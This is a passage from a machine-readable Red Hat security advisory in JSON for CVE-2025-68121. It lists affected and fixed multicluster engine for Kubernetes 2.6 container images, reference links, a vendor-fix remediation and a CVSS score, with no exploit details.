2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64"], "known_not_affected": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2025-68121"}, {"category": "external", "summary": "RHBZ#2437111", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121", "url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"}, {"category": "external", "summary": "https://go.dev/cl/737700", "url": "https://go.dev/cl/737700"}, {"category": "external", "summary": "https://go.dev/issue/77217", "url": "https://go.dev/issue/77217"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk", "url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4337", "url": "https://pkg.go.dev/vuln/GO-2026-4337"}], "release_date": "2026-02-05T17:48:44.141000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T17:54:30+00:00", "details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.11/html/clusters/cluster_mce_overview#mce-install-intro", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9848"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 